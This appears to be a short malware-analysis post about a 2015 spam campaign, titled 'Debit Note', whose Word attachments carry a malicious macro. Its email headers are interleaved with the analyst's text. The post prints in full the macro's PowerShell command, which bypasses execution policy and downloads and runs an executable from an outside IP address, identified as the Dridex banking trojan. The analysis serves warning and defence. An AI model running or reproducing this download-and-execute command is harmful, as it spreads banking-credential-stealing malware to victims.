From: Scot DennisThe number in the brackets varies, and the attachment seems to be randomly named (for example. 42549959.doc). There are probably many, many variants of this but the sample I saw had this malicious macro [pastebin] that executed the following command:
Date: 31 March 2015 at 14:32
Subject: Debit Note  information attached to this email
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://220.127.116.11/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;The executable downloaded is identical to the one used in this spam run also taking place today. The payload is the Dridex banking trojan.